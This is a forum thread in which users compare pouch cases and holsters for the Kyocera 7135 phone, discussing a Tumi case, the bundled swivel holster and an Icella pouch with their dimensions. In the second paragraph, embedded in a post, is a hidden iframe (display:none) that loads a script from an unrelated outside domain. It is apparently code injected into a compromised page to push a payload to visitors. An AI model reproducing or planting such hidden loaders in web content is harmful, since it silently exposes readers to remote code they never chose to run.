The perfect case for the 7135

Don't waste your money at the accessory store if your interested in a pouch case for the 7135.

Tumi has a "small phone case" that is almost the exact specifications as the 7135 - 4" x 2.5" x 1". It just doesn't get any better than this for this phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

This tumi case is 50.00, there is no image on the website that shows what it looks like opened. Also, there seems to be no slot for holding media cards... how is this so much better than the cases keyocera is selling?

Because it's a Tumi

This is high quality leather - about the best in the business. Not sure why you need slots for cards. How many do you plan on carrying with you - I think 1 in the phone is more than enough.

If you've never had a Tumi brief case or computer back or travel bag then you should check them out. It's the best stuff in the business.

Hmm, I have seen no better case then the holster that comes with it. It's hard, it rotates, it quick releases the handset, while protecting it, and keeping it from popping out......

No, it has a belt clip that swivels. The belt clip hooks at the end so that the holster can't jsut come off, or slide off a belt or pocket. If any of you had the belt clip for the 6035, you know what I am talking about.

I'm going to probably be a holster man myself.... but I also want to get the leather case.... it would give me a little piece of mind about dropping the 7135 (which will NEVER happen! )

I probably will get the Kyo pouch too... they all come in handy depending on the occaision

Actually, that picture doesn't look like a 7135 to me... the silver siding and grey antenna don't fit the 7135's profile. I suspect that phone is a Motorola v60.

Thanks for the comparison. I too had that StarTac, but with the flat, ultra slim battery.

I am encouraged by the very small difference in height & width.

Robert, you should probably update you signature to say, "Bring on SPRINT'S 7135!!!"

Since for some lucky folks, the 7135 is already here.

Has anyone tried the Tumi case? Opinions? Looking for a pouch style case; prefer horizontal storage (so the antenna is parallel to my belt -- this helps save the kidneys from stabbage)...

I didnt try the Tumi (they are nice products) but I did get the Kyoc puch. I agree w what hot synch said earlier, the holster is great bc it gives you flexibility. The Kyoc pouch (and I would bet all others as they use the same button design to snap into the belt clip) always makes the phone verticle. I have stabbed myself many times with the 6035. The holster that comes w the 7135 allows you to not only rotate the phone but it will stay horizontal (90 degrees OR 180) so you wont break something. I find it very easy to get in and out of the holster w one hand as well.

After some additional searching for a horizontal type pouch, I discovered Icella's pouch ...I have one of their for my V60c, and it works pretty good. I'm going to order it and see how it fits.

Dimensions of pouch (from site above): Size: 4.00" x 2.81" x 1.13"

Dimensions of 7135 (from kyocera's website): Size: 3.97 in x 2.43 in x 1.17 in

Pretty darn close!

is the 4.00" measurement the size of case or size of the phone the case can hold?

cause .o3 isnt much room left over.
